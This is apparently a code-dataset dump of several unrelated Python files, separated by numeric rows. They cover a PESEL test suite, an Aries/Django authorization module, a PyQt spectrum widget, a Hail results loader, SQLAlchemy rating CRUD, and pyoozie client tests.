            package_tags, package_tags_immutable = api_tag_package(
                owner=owner,
                repo=repo,
                identifier=package,
                data={"action": "replace", "tags": tags, "is_immutable": immutable},
            )

    click.secho("OK", fg="green")
    # Show the resulting (mutable + immutable) tag sets after the change.
    _print_tags(opts, package_tags, package_tags_immutable)
| 11,323 | 3,583 |
from pesel import Pesel
import pytest
@pytest.fixture(scope='session', params=["65432101239"])
def pesel_value(request):
    # Session-scoped, parametrized fixture: add more sample PESEL strings to
    # `params` to run the whole suite against each of them.
    return request.param


@pytest.fixture(scope='session')
def pesel_obj(pesel_value):
    # One shared Pesel instance per (value, session) pair; assumes Pesel is
    # effectively immutable so sharing across tests is safe — TODO confirm.
    return Pesel(pesel_value)
def test_correct_pesel(pesel_obj, pesel_value):
    # The raw PESEL string should be stored unchanged on the object.
    # (pytest.assume — from the pytest-assume plugin — records the failure but
    # lets the test continue, unlike a plain assert.)
    pytest.assume(pesel_obj.value == pesel_value)


def test_correct_pesel_gender(pesel_obj):
    # 10th digit of "65432101239" is 3 (odd) => male per the PESEL spec.
    pytest.assume(pesel_obj.gender == 'male')


def test_correct_pesel_male(pesel_obj):
    # Boolean convenience flag should agree with the gender above.
    pytest.assume(pesel_obj.male is True)


def test_correct_pesel_year(pesel_obj):
    # Month field is 43 (41-52 encodes the 2100s), so year = 2100 + 65 = 2165.
    pytest.assume(pesel_obj.year == 2165)


def test_correct_pesel_month(pesel_obj):
    # Month field 43 - 40 = 3 (March).
    pytest.assume(pesel_obj.month == 3)


def test_incorrect_pesel_day(pesel_obj):
    # NOTE(review): the name says "incorrect" but this asserts the correctly
    # decoded day (digits 5-6 = "21") of a valid PESEL — consider renaming to
    # test_correct_pesel_day, or supplying an actually invalid PESEL here.
    pytest.assume(pesel_obj.day == 21)
| 764 | 320 |
from aca.client import ACAClient
from aries_cloudcontroller.aries_controller import AriesAgentController
from asgiref.sync import sync_to_async, async_to_sync
from django.utils import timezone
from datetime import timedelta
from aca.models import PresentationFactory
from oidc.utils.shortener import create_short_url
from oidc.models import AuthSession, PresentationConfigurations, MappedUrl
from django.conf import settings
from datetime import datetime, timedelta
import asyncio
# NOTE(review): hard-coded ngrok tunnel URLs — these are developer-specific and
# expire; they should come from settings/environment before production use.
WEBHOOK_HOST = "https://8b1dec9d51dd.ngrok.io"
WEBHOOK_PORT = 443
WEBHOOK_BASE = "https://8b1dec9d51dd.ngrok.io/webhooks/"
def authorization(pres_req_conf_id: str, request_parameters: dict):
    """Create a proof request for the given presentation configuration and
    persist an AuthSession for it.

    Returns a tuple of (short_url, session_pk, presentation_request_id,
    b64_presentation) for the caller to hand to the wallet/user.
    """
    aca_client = ACAClient(settings.ACA_PY_URL, settings.ACA_PY_TRANSPORT_URL)
    # Raises PresentationConfigurations.DoesNotExist for an unknown id.
    presentation_configuration = PresentationConfigurations.objects.get(
        id=pres_req_conf_id
    )
    response = aca_client.create_proof_request(presentation_configuration.to_json())
    print('PROOF CREATE', response)
    public_did = aca_client.get_public_did()
    print('DID', public_did)
    endpoint = aca_client.get_endpoint_url()
    print('ENDPOINT', endpoint)
    # Wrap the agent's raw proof response into the wire-format presentation
    # request (thread id, verkey and service endpoint included).
    presentation_request = PresentationFactory.from_params(
        presentation_request=response.get("presentation_request"),
        p_id=response.get("thread_id"),
        verkey=[public_did.get("verkey")],
        endpoint=endpoint,
    ).to_json()
    print('PROOF REQUEST ', presentation_request)
    presentation_request_id = response["presentation_exchange_id"]
    # Session expires after one hour; webhook handlers look it up by
    # presentation_request_id when the proof comes back.
    session = AuthSession.objects.create(
        presentation_record_id=pres_req_conf_id,
        presentation_request_id=presentation_request_id,
        presentation_request=presentation_request,
        request_parameters=request_parameters,
        expired_timestamp=timezone.now() + timedelta(minutes=60),
    )
    # Shorten the (large, base64-bearing) request URL for QR-code friendliness.
    url, b64_presentation = create_short_url(presentation_request)
    mapped_url = MappedUrl.objects.create(url=url, session=session)
    short_url = mapped_url.get_short_url()
    return short_url, str(session.pk), presentation_request_id, b64_presentation
@sync_to_async
def getPresentationConfig(pres_req_conf_id: str):
    """Fetch the PresentationConfigurations row for *pres_req_conf_id*.

    Wrapped with ``sync_to_async`` so the synchronous Django ORM call can be
    awaited from async code. Raises ``DoesNotExist`` for an unknown id.
    """
    config = PresentationConfigurations.objects.get(id=pres_req_conf_id)
    return config
@sync_to_async
def createSession(pres_req_conf_id, presentation_request_id, presentation_request, request_parameters, url):
    """Persist an AuthSession plus its MappedUrl (sync ORM work wrapped for
    async callers).

    Returns (session, mapped_url, short_url).
    """
    # Session expires after one hour; webhook handlers look it up by
    # presentation_request_id when the proof comes back.
    session = AuthSession.objects.create(
        presentation_record_id=pres_req_conf_id,
        presentation_request_id=presentation_request_id,
        presentation_request=presentation_request,
        request_parameters=request_parameters,
        expired_timestamp= timezone.now() + timedelta(minutes=60),
    )
    # Map the long request URL to a short, QR-friendly one tied to the session.
    mapped_url = MappedUrl.objects.create(url=url, session=session)
    print(mapped_url)
    short_url = mapped_url.get_short_url()
    print(short_url)
    return session, mapped_url, short_url
async def authorization_async(pres_req_conf_id: str, request_parameters: dict):
    """Async variant of :func:`authorization` driven through
    AriesAgentController instead of the plain ACAClient.

    Creates a proof request, (re-)ledgers the agent endpoint after accepting
    the TAA, persists an AuthSession, and returns
    (short_url, session_pk, presentation_request_id, b64_presentation).
    """
    # Based on the aca-py agent you wish to control
    # print('AGENT CONNECT')
    agent_controller = AriesAgentController(admin_url=settings.ACA_PY_URL)
    # print('ACAPY AGENT CONNECTED')
    # print('WEBHOOOKS STARTING')
    # await asyncio.gather(agent_controller.init_webhook_server(webhook_host=WEBHOOK_HOST, webhook_port=WEBHOOK_PORT, webhook_base=WEBHOOK_BASE))
    # print('WEBHOOOKS STARTED')
    presentation_configuration = await getPresentationConfig(pres_req_conf_id)
    print('PRESENTATION CONFIG: ', presentation_configuration)
    # response = await agent_controller.proofs.create_request(presentation_configuration.to_json())
    # asyncio.gather on a single coroutine returns a one-element list.
    response = await asyncio.gather(agent_controller.proofs.create_request(presentation_configuration.to_json()))
    response = response[0]
    print('PROOF CREATE: ', response)
    # TODO - the current DID of the Agent is already ledgered on Stagingnet
    # This creates a scenario where the endpoint being fetched is wrong
    # Need to update the code so that new DIDs can be ledgered to stagingnet together with endpoints
    public_did = await asyncio.gather(agent_controller.wallet.get_public_did())
    public_did = public_did[0]['result']
    print('PUBLIC DID: ', public_did)
    endpoint = await asyncio.gather(agent_controller.ledger.get_did_endpoint(public_did['did']))
    endpoint = endpoint[0]['endpoint']
    print('ENDPOINT: ', endpoint)
    # TODO - this will wail due to no TAA accepted on ledger
    # Accept the ledger's Transaction Author Agreement so the endpoint write
    # below is permitted.
    TAA_response = await agent_controller.ledger.get_taa()
    TAA = TAA_response['result']['taa_record']
    TAA['mechanism'] = "service_agreement"
    # print(TAA)
    TAA_accept = await agent_controller.ledger.accept_taa(TAA)
    ## Will return {} if successful
    print(TAA_accept)
    # Re-ledger the agent's transport URL as its DID endpoint, then re-read it
    # to confirm the write took effect.
    await asyncio.gather(agent_controller.wallet.set_did_endpoint(public_did['did'], settings.ACA_PY_TRANSPORT_URL, 'Endpoint'))
    endpoint = await asyncio.gather(agent_controller.ledger.get_did_endpoint(public_did['did']))
    endpoint = endpoint[0]['endpoint']
    print('ENDPOINT ', endpoint)
    presentation_request = PresentationFactory.from_params(
        presentation_request=response.get("presentation_request"),
        p_id=response.get("thread_id"),
        verkey=[public_did.get("verkey")],
        endpoint=endpoint,
    ).to_json()
    print('PROOF REQUEST: ', presentation_request)
    presentation_request_id = response["presentation_exchange_id"]
    # Shorten the (large, base64-bearing) request URL for QR-code friendliness.
    url, b64_presentation = create_short_url(presentation_request)
    print(url)
    session, mapped_url, short_url = await createSession(pres_req_conf_id, presentation_request_id, presentation_request, request_parameters, url)
    print('SESSION ', session)
    print('sessionpk: ', str(session.pk))
    print('mapped_url: ', mapped_url)
    print('short_url: ', short_url)
    print('presx_id: ', presentation_request_id)
    print('b64 presx: ', b64_presentation)
    # Close the controller's client session before returning.
    await agent_controller.terminate()
    return short_url, str(session.pk), presentation_request_id, b64_presentation
| 5,978 | 1,854 |
# Read two 5x5 integer matrices from stdin, multiply them, sum each row of
# the product, and print a name chosen from the position of the smallest
# row sum in the REVERSED list of sums.
names = ['Youngki', 'Jinwoo', 'Jungwoo', 'Junsuk', 'Inseo']

left = [[int(tok) for tok in input().split()] for _ in range(5)]
right = [[int(tok) for tok in input().split()] for _ in range(5)]

# Standard triple-loop matrix product, expressed as nested comprehensions.
product = [
    [sum(left[row][k] * right[k][col] for k in range(5)) for col in range(5)]
    for row in range(5)
]

row_sums = [sum(row) for row in product]
# NOTE(review): the sums are reversed before indexing but `names` is not,
# which looks suspicious; preserved exactly to keep the original behavior.
row_sums.reverse()
print(names[row_sums.index(min(row_sums))])
| 425 | 195 |
"""Class :py:class:`IVSpectrum` is a QWidget with histogram, two axes, and color bar
====================================================================================
Usage ::
# Run test: python lcls2/psana/psana/graphqt/IVSpectrum.py
from psana.graphqt.IVSpectrum import IVSpectrum
w = IVSpectrum()
Created on 2021-06-22 by Mikhail Dubrovin
"""
import logging
logger = logging.getLogger(__name__)
from psana.graphqt.FWViewHist import FWViewHist
from psana.graphqt.FWViewAxis import FWViewAxis
from psana.graphqt.FWViewColorBar import FWViewColorBar
import psana.graphqt.ColorTable as ct
from PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QTextEdit
from PyQt5.QtCore import Qt, QRectF
def test_image():
    """Return a small random 8x12 array used as the default demo image."""
    import psana.pyalgos.generic.NDArrGenerators as ag
    # Gaussian noise, mean 0, sigma 10.
    return ag.random_standard((8,12), mu=0, sigma=10)
class IVSpectrum(QWidget):
    """Spectrum viewer widget: a histogram panel flanked by horizontal and
    vertical axes, a color bar, an info pane, and a reset button. The three
    views are kept in sync through scene-rect-changed signals.
    """

    def __init__(self, **kwargs):
        parent = kwargs.get('parent', None)
        # NOTE(review): `image` is accepted but never used below — confirm
        # whether it should be forwarded to the histogram view.
        image = kwargs.get('image', test_image())
        QWidget.__init__(self, parent)

        ctab = ct.color_table_interpolated()
        # Initial scene rect for the histogram view (x: 0-100, y: 0-1000).
        rs=QRectF(0, 0, 100, 1000)
        self.whis = FWViewHist(self, rs, origin='DR', scale_ctl='V', fgcolor='yellow', bgcolor='dark', orient='V')
        self.wcbar = FWViewColorBar(self, coltab=ctab, orient='V')

        # Axis scene rects share the histogram's extent along their own axis
        # and have unit thickness along the other.
        r = self.whis.sceneRect()
        rscx = QRectF(r.x(), 0, r.width(), 1)
        rscy = QRectF(0, r.y(), 1, r.height())
        self.wax = FWViewAxis(None, rscx, side='U', origin='UR', scale_ctl=True, wwidth=30, wlength=200)
        self.way = FWViewAxis(None, rscy, side='L', origin='DL', scale_ctl=True, wwidth=60, wlength=200)

        self.but_reset = QPushButton('Reset')
        self.edi_info = QTextEdit('Info')

        # 11x11 grid: info pane on top, histogram in the middle with the
        # y-axis/color bar on the right, x-axis and reset button at the bottom.
        self.box = QGridLayout()
        self.box.setSpacing(0)
        self.box.setVerticalSpacing(0)
        self.box.setHorizontalSpacing(0)
        self.box.addWidget(self.edi_info, 0, 0, 1, 11)
        self.box.addWidget(self.way, 1, 10, 9, 1)
        self.box.addWidget(self.whis, 1, 0, 9, 10)
        self.box.addWidget(self.wax, 10, 0, 1, 9)
        self.box.addWidget(self.wcbar, 1, 9, 9, 1)
        self.box.addWidget(self.but_reset, 10, 9, 1, 2, alignment=Qt.AlignCenter)
        self.setLayout(self.box)

        self.set_tool_tips()
        self.set_style()
        self.connect_scene_rect_changed()
        self.but_reset.clicked.connect(self.on_but_reset)

    def connect_scene_rect_changed(self):
        """Subscribe to scene-rect changes so histogram and axes track each other."""
        self.whis.connect_scene_rect_changed_to(self.on_whis_scene_rect_changed)
        self.wax.connect_scene_rect_changed_to(self.on_wax_scene_rect_changed)
        self.way.connect_scene_rect_changed_to(self.on_way_scene_rect_changed)

    def disconnect_scene_rect_changed(self):
        """Undo :meth:`connect_scene_rect_changed`."""
        self.whis.disconnect_scene_rect_changed_from(self.on_whis_scene_rect_changed)
        self.wax.disconnect_scene_rect_changed_from(self.on_wax_scene_rect_changed)
        self.way.disconnect_scene_rect_changed_from(self.on_way_scene_rect_changed)

    def on_but_reset(self):
        """Reset the histogram view to its original zoom/pan state."""
        logger.debug('on_but_reset')
        if self.whis is not None:
            self.whis.reset_original_size()

    def on_whis_scene_rect_changed(self, r):
        """Histogram view changed: propagate the new extents to both axes."""
        #logger.debug('on_whis_scene_rect_changed: %s'%str(r))
        self.wax.set_view(rs=QRectF(r.x(), 0, r.width(), 1))
        self.way.set_view(rs=QRectF(0, r.y(), 1, r.height()))
        self.update_info()

    def on_wax_scene_rect_changed(self, r):
        """X-axis changed: update the histogram's horizontal extent only."""
        #logger.debug('on_wax_scene_rect_changed: %s'%str(r))
        rs = self.whis.scene().sceneRect()
        self.whis.set_view(rs=QRectF(r.x(), rs.y(), r.width(), rs.height()))

    def on_way_scene_rect_changed(self, r):
        """Y-axis changed: update the histogram's vertical extent only."""
        #logger.debug('on_way_scene_rect_changed: %s'%str(r))
        rs = self.whis.scene().sceneRect()
        self.whis.set_view(rs=QRectF(rs.x(), r.y(), rs.width(), r.height()))
        self.update_info()

    def update_info(self):
        """Show the currently visible vertical (intensity) range in the info pane."""
        r = self.whis.scene().sceneRect()
        self.edi_info.setText('Spectrum min: %d max: %d' % (r.y(), r.y()+r.height()))

    def set_tool_tips(self):
        self.whis.setToolTip('Spectrum')

    def set_style(self):
        """Fix widget margins and sizes for a compact layout."""
        self.layout().setContentsMargins(0,0,0,0)
        #self.but_reset.setFixedSize(60,30)
        self.wcbar.setFixedWidth(25)
        #self.edi_info.setFixedHeight(100)
        self.edi_info.setMaximumHeight(50)

    def set_pixmap_from_arr(self, arr, set_def=True):
        """Shortcut to the histogram view's image setter."""
        self.whis.set_pixmap_from_arr(arr, set_def)

    def reset_original_size(self):
        """Shortcut to the histogram view's zoom/pan reset."""
        self.whis.reset_original_size()
if __name__ == "__main__":
    # Stand-alone demo: show the spectrum widget in its own window.
    import os
    import sys
    os.environ['LIBGL_ALWAYS_INDIRECT'] = '1' #export LIBGL_ALWAYS_INDIRECT=1
    from PyQt5.QtWidgets import QApplication
    logging.basicConfig(format='[%(levelname).1s] L%(lineno)04d %(name)s : %(message)s', level=logging.DEBUG)
    app = QApplication(sys.argv)
    w = IVSpectrum()
    w.setGeometry(100, 50, 300, 800)
    w.setWindowTitle('Image with two axes')
    w.show()
    app.exec_()
    # Explicit teardown to release Qt resources before interpreter exit.
    del w
    del app

# EOF
| 5,163 | 1,992 |
#!/usr/bin/env python3
__author__ = 'konradk'
from ukb_common import *
import argparse
import tempfile
# Argument names that together uniquely identify a phenotype.
PHENO_KEY_FIELDS = ('trait_type', 'phenocode', 'pheno_sex', 'coding', 'modifier')


def main(args):
    """Load SAIGE association results (gene- or variant-level) into Hail tables
    for one phenotype, pulling run metadata out of the SAIGE/null-model logs.
    """
    # Local Spark with one worker per requested thread; log to a temp file.
    # (`os` is presumably re-exported by `from ukb_common import *` — verify.)
    hl.init(master=f'local[{args.n_threads}]',
            log=hl.utils.timestamp_path(os.path.join(tempfile.gettempdir(), 'load_results'), suffix='.log'),
            default_reference=args.reference)

    # Case/control counts come from the per-chromosome SAIGE run logs.
    cases, controls = get_cases_and_controls_from_log(args.saige_run_log_format)

    quantitative_trait = args.trait_type in ('continuous', 'biomarkers')
    # Metadata defaults (-1.0 / 'NA') when no null-model log was provided.
    heritability = get_heritability_from_log(args.null_glmm_log, quantitative_trait) if args.null_glmm_log else -1.0
    inv_normalized = get_inverse_normalize_status(args.null_glmm_log) if args.null_glmm_log else 'NA'
    saige_version = get_saige_version_from_log(args.null_glmm_log) if args.null_glmm_log else 'NA'
    # SAIGE names its single-variant output differently in gene mode.
    extension = 'single.txt' if args.analysis_type == 'gene' else 'single_variant.txt'
    pheno_key_dict = {k: getattr(args, k) for k in PHENO_KEY_FIELDS}
    if args.analysis_type == 'gene':
        load_gene_data(args.input_dir, pheno_key_dict, args.gene_map_ht_raw_path, cases, controls, heritability, saige_version, inv_normalized, args.overwrite)
    # Single-variant results are loaded for both analysis types.
    load_variant_data(args.input_dir, pheno_key_dict, args.ukb_vep_ht_path, extension, cases, controls, heritability, saige_version, inv_normalized, args.overwrite,
                      args.legacy_annotations)
if __name__ == '__main__':
    # CLI wrapper: the phenotype-key options mirror PHENO_KEY_FIELDS above.
    parser = argparse.ArgumentParser()
    parser.add_argument('--input_dir', help='Input directory', required=True)
    parser.add_argument('--trait_type', help='Trait type', required=True)
    parser.add_argument('--phenocode', help='Phenotype ID', required=True)
    parser.add_argument('--pheno_sex', help='Phenotype sex', default='both_sexes')
    parser.add_argument('--coding', help='Phenotype coding', default='')
    parser.add_argument('--modifier', help='Phenotype modifier', default='')
    parser.add_argument('--null_glmm_log', help='Path to log file from null model')
    parser.add_argument('--saige_run_log_format', help='Path to log file from SAIGE test with {chr} placeholder', required=True)
    parser.add_argument('--analysis_type', help='Analysis type', choices=('gene', 'variant'), default='gene')
    parser.add_argument('--reference', help='Reference genome', default='GRCh38')
    parser.add_argument('--gene_map_ht_raw_path', help='Path to raw gene map')
    parser.add_argument('--ukb_vep_ht_path', help='Path to UKB VEP data', required=True)
    parser.add_argument('--n_threads', help='Number of threads to run', type=int, default=8)
    parser.add_argument('--legacy_annotations', help='Use old annotation picking (preferred for genotype data)', action='store_true')
    parser.add_argument('--overwrite', help='Overwrite everything', action='store_true')
    args = parser.parse_args()
    main(args)
"""All DB functions for the Bewertung table"""
from typing import List
from typing import Union
import sqlalchemy
from sqlalchemy.orm import Session
from db.base import BewertungRecipe
from db.base import Person
from db.crud.user import get_user_by_mail
from schemes import scheme_recipe
from schemes import scheme_user
from schemes.exceptions import DatabaseException
from schemes.exceptions import DuplicateEntry
from schemes.exceptions import UserNotFound
from tools.my_logging import logger
def get_bewertung_from_user_to_recipe(
    db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase
) -> BewertungRecipe:
    """Return a specific bewertung from a user to only one recipe

    Args:
        db (Session): Session to the DB
        user (scheme_user.UserBase): Specifie the User
        recipe (scheme_recipe.RecipeBase): Specifie the reciepe

    Returns:
        BewertungRecipe: Return one bewertung that match the recipe - user
    """
    # Multiple filter arguments are AND-ed together by SQLAlchemy.
    query = (
        db.query(BewertungRecipe)
        .join(Person, Person.email == BewertungRecipe.person_email)
        .filter(Person.email == user.email, BewertungRecipe.rezept_id == recipe.id)
    )
    return query.first()
def get_all_user_bewertungen(db: Session, user: scheme_user.UserBase) -> Union[List[BewertungRecipe], None]:
    """Return all bewertugen from one to the recipes User

    Args:
        db (Session): Session to the DB
        user (scheme_user.UserBase): The user to select

    Returns:
        Union[List[BewertungRecipe], None]
    """
    # Distinct local name avoids shadowing the `user` parameter.
    person: Person = get_user_by_mail(db, user.email)
    if person is None:
        return None
    return person.bewertungenRezept
def create_bewertung(db: Session, assessment: scheme_recipe.RecipeBewertungCreate) -> BewertungRecipe:
    """Create / Add a Bewertung to the DB. Timestamp and ID will set automatic.

    Args:
        db (Session): Session to the DB
        assessment (scheme_recipe.RecipeBewertungCreate): Bewertung to add. This include the
            Person and Recipe for the mapping of the Bewertung

    Raises:
        UserNotFound: If the user does not exist
        DuplicateEntry: Duplicate Primary Key

    Returns:
        BewertungRecipe: Return if success
    """
    # Validate the FK target up front to raise a domain error rather than a
    # raw DB integrity error for an unknown user.
    if get_user_by_mail(db, assessment.person.email) is None:
        raise UserNotFound(f"User {assessment.person.email} does not exist", assessment.person.email)
    db_assessment = BewertungRecipe(
        person_email=assessment.person.email,
        rezept_id=assessment.recipe.id,
        rezept_name=assessment.name,
        kommentar=assessment.comment,
        rating=assessment.rating,
    )
    try:
        db.add(db_assessment)
        db.commit()
        # Refresh to pick up DB-generated fields (id, timestamp).
        db.refresh(db_assessment)
        logger.info(
            "Added assessment to db... recipe id:%s\temail:%s\trating:%s\tcomment:%s",
            db_assessment.rezept_id,
            db_assessment.person_email,
            db_assessment.rating,
            db_assessment.kommentar,
        )
        return db_assessment
    except sqlalchemy.exc.IntegrityError as error:
        # Duplicate (person_email, rezept_id) primary key.
        raise DuplicateEntry("Assessment already exist") from error
def update_assessment(
    db: Session, old_bewertung: scheme_recipe.RecipeBewertungCreate, new_bewertung: scheme_recipe.RecipeBewertungCreate
) -> BewertungRecipe:
    """Update the comment and rating of a bewertung

    Args:
        db (Session): Session to the DB
        old_bewertung (scheme_recipe.RecipeBewertungCreate): The old Bewertung
        new_bewertung (scheme_recipe.RecipeBewertungCreate): The updated Bewertung

    Returns:
        BewertungRecipe: New Bewertung from `get_bewertung_from_user_to_recipe`
    """
    # Bulk UPDATE keyed by the old bewertung's composite key; returns the
    # number of matched rows without loading ORM objects.
    rows = (
        db.query(BewertungRecipe)
        .filter(BewertungRecipe.person_email == old_bewertung.person.email)
        .filter(BewertungRecipe.rezept_id == old_bewertung.recipe.id)
        .update({BewertungRecipe.kommentar: new_bewertung.comment, BewertungRecipe.rating: new_bewertung.rating})
    )
    # Zero matched rows means user/recipe pair was not found; nothing to commit.
    if rows == 0:
        raise DatabaseException("Can not update assessment. Does the User and the Recipe exist?")
    db.commit()
    logger.info("Updated bewertung %s - %s", old_bewertung.person.email, old_bewertung.recipe.id)
    # Re-read through the ORM so the caller gets a fresh entity.
    return get_bewertung_from_user_to_recipe(db, new_bewertung.person, new_bewertung.recipe)
def delete_bewertung(db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase) -> int:
    """Delete one Bewertung

    Args:
        db (Session): Session to the db
        user (scheme_user.User): The owner of the Bewertung
        recipe (scheme_recipe.RecipeBase): The corrosponding Recipe

    Returns:
        int: Number of effected rows
    """
    # Bulk DELETE keyed by the composite (person_email, rezept_id) key.
    affected = (
        db.query(BewertungRecipe)
        .filter(BewertungRecipe.person_email == user.email)
        .filter(BewertungRecipe.rezept_id == recipe.id)
        .delete()
    )
    db.commit()
    logger.info("Deleted bewertung %s - %s", user.email, recipe.id)
    return affected
| 4,981 | 1,595 |
# Copyright (c) 2017 "Shopify inc." All rights reserved.
# Use of this source code is governed by a MIT-style license that can be found in the LICENSE file.
from __future__ import unicode_literals
import copy
import mock
import pytest
import requests_mock
import requests
from pyoozie import exceptions
from pyoozie import model
from pyoozie import client
from pyoozie import xml
# TODO: share these with test_model.py?
# Representative Oozie job/action identifiers used as fixture data throughout.
SAMPLE_COORD_ID = '0123456-123456789012345-oozie-oozi-C'
SAMPLE_COORD_ACTION = '0123456-123456789012345-oozie-oozi-C@12'
SAMPLE_WF_ID = '0123456-123456789012345-oozie-oozi-W'
SAMPLE_WF_ACTION = '0123456-123456789012345-oozie-oozi-W@foo'
@pytest.fixture
def oozie_config():
    # Keyword arguments accepted by client.OozieClient's constructor.
    return {
        'url': 'http://localhost:11000/oozie',
        'user': 'oozie',
        'timeout': 30,
        'verbose': False,
        'launcher_memory_in_mb': '5000',
        'launcher_queue': 'test.ignore',
    }


@pytest.fixture
def api(oozie_config):
    # Client with the connection self-test patched out so no server is needed.
    with mock.patch('pyoozie.client.OozieClient._test_connection'):
        yield client.OozieClient(**oozie_config)


@pytest.fixture
def api_with_session(oozie_config):
    # Same as `api`, but injects a caller-supplied requests.Session carrying a
    # marker header so tests can verify the session is actually used.
    with mock.patch('pyoozie.client.OozieClient._test_connection'):
        session = requests.Session()
        session.headers.update({'test-header': 'true'})
        yield client.OozieClient(session=session, **oozie_config)
# Coordinator fixtures in each lifecycle status of interest.

@pytest.fixture
def sample_coordinator_running(api):
    info = {
        'coordJobId': SAMPLE_COORD_ID,
        'status': 'RUNNING'
    }
    return model.Coordinator(api, info, None)


@pytest.fixture
def sample_coordinator_suspended(api):
    info = {
        'coordJobId': SAMPLE_COORD_ID,
        'status': 'SUSPENDED'
    }
    return model.Coordinator(api, info, None)


@pytest.fixture
def sample_coordinator_killed(api):
    info = {
        'coordJobId': SAMPLE_COORD_ID,
        'status': 'KILLED'
    }
    return model.Coordinator(api, info, None)


# Coordinator-action fixtures; each registers itself as action #12 of its
# parent coordinator so parent().actions lookups resolve.

@pytest.fixture
def sample_coordinator_action_running(api, sample_coordinator_running):
    info = {
        'id': SAMPLE_COORD_ACTION,
        'status': 'RUNNING'
    }
    action = model.CoordinatorAction(api, info, sample_coordinator_running)
    action.parent().actions = {12: action}
    return action


@pytest.fixture
def sample_coordinator_action_suspended(api, sample_coordinator_running):
    info = {
        'id': SAMPLE_COORD_ACTION,
        'status': 'SUSPENDED'
    }
    action = model.CoordinatorAction(api, info, sample_coordinator_running)
    action.parent().actions = {12: action}
    return action


@pytest.fixture
def sample_coordinator_action_killed(api, sample_coordinator_running):
    info = {
        'id': SAMPLE_COORD_ACTION,
        'status': 'KILLED'
    }
    action = model.CoordinatorAction(api, info, sample_coordinator_running)
    action.parent().actions = {12: action}
    return action


@pytest.fixture
def sample_coordinator_action_killed_with_killed_coordinator(api, sample_coordinator_killed):
    # KILLED action whose parent coordinator is also KILLED.
    info = {
        'id': SAMPLE_COORD_ACTION,
        'status': 'KILLED'
    }
    action = model.CoordinatorAction(api, info, sample_coordinator_killed)
    action.parent().actions = {12: action}
    return action
# Workflow fixtures in each lifecycle status of interest.

@pytest.fixture
def sample_workflow_running(api):
    info = {
        'id': SAMPLE_WF_ID,
        'status': 'RUNNING'
    }
    return model.Workflow(api, info, None)


@pytest.fixture
def sample_workflow_suspended(api):
    info = {
        'id': SAMPLE_WF_ID,
        'status': 'SUSPENDED'
    }
    return model.Workflow(api, info, None)


@pytest.fixture
def sample_workflow_killed(api):
    info = {
        'id': SAMPLE_WF_ID,
        'status': 'KILLED'
    }
    return model.Workflow(api, info, None)


@pytest.fixture
def sample_workflow_prep(api):
    info = {
        'id': SAMPLE_WF_ID,
        'status': 'PREP'
    }
    return model.Workflow(api, info, None)
class TestOozieClientCore(object):
    """Construction, connection self-test, and low-level HTTP plumbing."""

    @mock.patch('pyoozie.client.OozieClient._test_connection')
    def test_construction(self, mock_test_conn, oozie_config):
        # Construction alone must not hit the server (lazy connection test).
        api = client.OozieClient(**oozie_config)
        assert not mock_test_conn.called
        assert api._url == 'http://localhost:11000/oozie'
        assert api._session

    @mock.patch('pyoozie.client.OozieClient._test_connection')
    def test_construction_custom_session(self, mock_test_conn, oozie_config):
        # A caller-supplied session (with auth) is adopted as-is.
        session = requests.Session()
        session.auth = ('user', 'pass')
        api = client.OozieClient(session=session, **oozie_config)
        assert not mock_test_conn.called
        assert api._session.auth == session.auth

    def test_test_connection(self, oozie_config):
        # The self-test requires API version 2 in the server's versions list
        # and raises a descriptive OozieException otherwise.
        with requests_mock.mock() as m:
            session = requests.Session()

            m.get('http://localhost:11000/oozie/versions', text='[0, 1, 2]')
            client.OozieClient(**oozie_config)._test_connection()
            client.OozieClient(session=session, **oozie_config)._test_connection()

            m.get('http://localhost:11000/oozie/versions', text='[0, 1]')
            with pytest.raises(exceptions.OozieException) as err:
                client.OozieClient(**oozie_config)._test_connection()
                assert 'does not support API version 2' in str(err)

            m.get('http://localhost:11000/oozie/versions', status_code=404)
            with pytest.raises(exceptions.OozieException) as err:
                client.OozieClient(**oozie_config)._test_connection()
                assert 'Unable to contact Oozie server' in str(err)

            m.get('http://localhost:11000/oozie/versions', text='>>> fail <<<')
            with pytest.raises(exceptions.OozieException) as err:
                client.OozieClient(**oozie_config)._test_connection()
                assert 'Invalid response from Oozie server' in str(err)

    def test_test_connection_is_called_once(self, oozie_config):
        # The connection self-test must run lazily, once, on first API call.
        with requests_mock.mock() as m:
            m.get('http://localhost:11000/oozie/v2/admin/build-version', text='{}')
            with mock.patch('pyoozie.client.OozieClient._test_connection') as m_test:
                oozie_client = client.OozieClient(**oozie_config)
                oozie_client.admin_build_version()
                oozie_client.admin_build_version()
                m_test.assert_called_once_with()

    def test_request(self, api):
        # JSON body -> parsed dict; empty body -> None; junk -> OozieException.
        with requests_mock.mock() as m:
            m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}')
            result = api._request('GET', 'endpoint', None, None)
            assert result['result'] == 'pass'

        with requests_mock.mock() as m:
            m.get('http://localhost:11000/oozie/v2/endpoint')
            result = api._request('GET', 'endpoint', None, None)
            assert result is None

        with requests_mock.mock() as m:
            m.get('http://localhost:11000/oozie/v2/endpoint', text='>>> fail <<<')
            with pytest.raises(exceptions.OozieException) as err:
                api._request('GET', 'endpoint', None, None)
                assert 'Invalid response from Oozie server' in str(err)

    def test_request_uses_session_params(self, api_with_session):
        # Headers configured on the injected session must reach the wire.
        with requests_mock.mock() as m:
            m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}')
            result = api_with_session._request('GET', 'endpoint', None, None)
            assert result['result'] == 'pass'
            assert m.last_request.headers['test-header'] == 'true'

    def test_get(self, api):
        with requests_mock.mock() as m:
            m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}')
            result = api._get('endpoint')
            assert result['result'] == 'pass'

    def test_put(self, api):
        # PUT sends an XML content type and yields None on an empty response.
        with requests_mock.mock() as m:
            headers = {'Content-Type': 'application/xml'}
            m.put('http://localhost:11000/oozie/v2/endpoint', request_headers=headers)
            result = api._put('endpoint')
            assert result is None

    def test_post(self, api):
        with requests_mock.mock() as m:
            headers = {'Content-Type': 'application/xml'}
            m.post('http://localhost:11000/oozie/v2/endpoint', request_headers=headers, text='{"result": "pass"}')
            result = api._post('endpoint', content='<xml/>')
            assert result['result'] == 'pass'

    def test_headers(self, api):
        # Content-Type header appears only when a content type is supplied.
        headers = api._headers()
        assert headers == {}
        headers = api._headers(content_type='foo/bar')
        assert headers == {'Content-Type': 'foo/bar'}
